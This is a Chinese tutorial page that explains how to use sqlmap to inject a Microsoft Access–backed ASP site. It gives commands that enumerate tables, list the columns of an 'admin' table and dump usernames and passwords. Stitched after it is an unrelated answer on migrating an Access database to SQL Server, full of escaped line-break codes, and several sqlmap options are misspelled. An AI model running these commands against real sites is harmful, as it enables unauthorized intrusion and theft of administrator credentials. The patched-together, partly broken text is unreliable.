sqlmap怎么注入ACCESS数据库

sqlmap怎么注入ACCESS数据库,第1张

方法/步骤

首先我们先来跑表

命令是sqlmap –u “url/NewsShow.asp?id=69” –tables

一路上大家遇到这个

可以直接选择回车

等到了这里

大家选择线程1到10

开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表

然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin

然后得到了里面的字段username password id

然后我们直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”

然后一路还是回车。到了

还是选择线程1到10

最后跑出了用户名。密码

9

A1. 安装 SQLServer \x0d\x0aA2. 建立 SQLServer 数据库\x0d\x0a \x0d\x0a 在sqlserver数据库的“企业管理器”中新建一个数据库,命名为sample,建好后在sqlserver安装目录\MSSQL\Data \x0d\x0a文件夹下会生成sample_Data.MDF、sample_Log.LDF两个文件\x0d\x0a具体步骤:依次展开sql server 组 ==》右击数据库==》新建数据库==》命名sample==》确定\x0d\x0a \x0d\x0aA3. 导入表结构\x0d\x0a \x0d\x0aa. 建立表结构脚本 _ \x0d\x0a执行SqlSvrTbl.bat从sample.mdb抽取表结构,sample.mdb一定是当前型号的数据库,即执行makemdb、getmdb后获取的,\x0d\x0a注:SqlSvrTbl.bat可以在任意目录执行,执行时会出现如下信息(此报错信息可以忽略,该命令执行时间比较长):\x0d\x0ajava.sql.SQLException: [Microsoft][ODBC Microsoft Access Driver] 不能读取记录;\x0d\x0a在 'MSysQueries上没有读取数据权限。\x0d\x0a at \x0d\x0asun.jdbc.odbc.JdbcOdbc.createSQLException(JdbcOdbc.java:6026)\x0d\x0a ??\x0d\x0a \x0d\x0a b. 读入表结构脚本\x0d\x0a在sqlserver数据库的“查询分析器”界面中读入上一步生成的SqlSvrTbl.sql脚本,生成数据库结构\x0d\x0a具体步骤:打开上一步生成的SqlSvrTbl.sql脚本===》点击工具栏的“执行查询”按钮(或 按F5 执行)\x0d\x0a 注意:类似警告信息可忽略,错误要查明原因。\x0d\x0a警告: 已创建表 'Department',但其最大行大小(17573)超过了每行的最大字节数(8060)。如果结果行长度超过 8060 \x0d\x0a字节,则此表中行的 INSERT 或 UPDATE 将失败。 \x0d\x0aA4. 导入数据\x0d\x0a 使用sqlserver的“导入和导出数据”功能,按步骤将access数据库中的数据导入到sqlserver数据库的sample数据库中\x0d\x0a 具体步骤:运行“导入导出数据”工具==》下一步 ==》选择 数据源:Microsoft \x0d\x0aAccess\x0d\x0a ==》在“文件名”处,浏览打开需要导入的数据源 sample.mdb ==》下一步\x0d\x0a ==》选择目的数据库:在“数据库”下拉列表中选择之前建好的sample\x0d\x0a ==》一直“下一步” 到“选择源表和视图”将所有要导入的表和视图\x0d\x0a“勾选” 执行“下一步” ==》点“下一步”==》点“完成”开始导入\x0d\x0a注意:如果在导入完成后报如下错误提示,说明导入有错\x0d\x0a错误提示:\x0d\x0a在目的的行号为1处出错.到目前为止,在改任务中遇到错误数:1.\x0d\x0a 插入错误、列58("Birthday",DBTYPE_DBTIMESTAMP)、状态6:数据溢出。\x0d\x0a 对于造型说明无效的字符值。 \x0d\x0aA5. NHS 服务器连接数据库 \x0d\x0a a. 将nhssystem.mdb 手工拷到本机的%JXCRUN%\Bin文件夹中\x0d\x0a b.用客户端登录软件。\x0d\x0a如果出现“admin”用户不存在,在sqlserver中用查询管理器查询“select * from sysuser ” \x0d\x0a看结果跟access中数据库中sysuser中数据是否匹配。如果不匹配说明数据库有误,需要更换数据库。\x0d\x0a如果出现sa用户密码错误,没有连接上,先关掉软件。在sqlserver企业管理器中,打开“安全性”==》“登录”==》右击sa更改密码即可。\x0d\x0a在没有插网线的情况下,如果出现“不能连接SqlServer 或SqlServer \x0d\x0a拒绝连接”的错误,将网线插上试试看是否可以。如果还不行,查看SqlServer是否启动。


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/sjk/6781715.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-03-28
下一篇 2023-03-28

发表评论

登录后才能评论

评论列表(0条)

保存